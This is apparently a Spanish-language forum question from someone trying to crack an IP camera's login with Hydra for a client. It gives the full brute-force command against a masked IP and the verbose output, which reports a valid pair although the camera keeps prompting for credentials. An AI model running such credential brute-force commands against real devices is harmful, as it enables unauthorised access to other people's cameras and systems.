Tengo un cliente que tiene una cámara IP y estoy tratando de descifrar la contraseña con Hydra. Parece que se ha descifrado la contraseña, pero cuando intento iniciar sesión en ella, el diálogo de nombre de usuario y contraseña sigue apareciendo una y otra vez. Esto es lo que hice:
root@kali:~# hydra -l root -P '/root/Documents/top100pass' -e ns -f -V xxx.xxx.xxx.xxx http-get /
Y luego, aquí están los resultados.
[DATA] max 16 tasks per 1 server, overall 64 tasks, 100003 login tries (l:1/p:100003), ~97 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "root" - 1 of 100003 [child 0]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "" - 2 of 100003 [child 1]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "123456" - 3 of 100003 [child 2]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "password" - 4 of 100003 [child 3]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "12345678" - 5 of 100003 [child 4]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "qwerty" - 6 of 100003 [child 5]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "123456789" - 7 of 100003 [child 6]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "12345" - 8 of 100003 [child 7]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "1234" - 9 of 100003 [child 8]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "111111" - 10 of 100003 [child 9]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "1234567" - 11 of 100003 [child 10]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "dragon" - 12 of 100003 [child 11]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "123123" - 13 of 100003 [child 12]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "baseball" - 14 of 100003 [child 13]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "abc123" - 15 of 100003 [child 14]
[ATTEMPT] target xxx.xxx.xxx.xxx - login "root" - pass "football" - 16 of 100003 [child 15]
[80][http-get] host: xxx.xxx.xxx.xxx login: root
[STATUS] attack finished for xxx.xxx.xxx.xxx valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-20 09:38:21"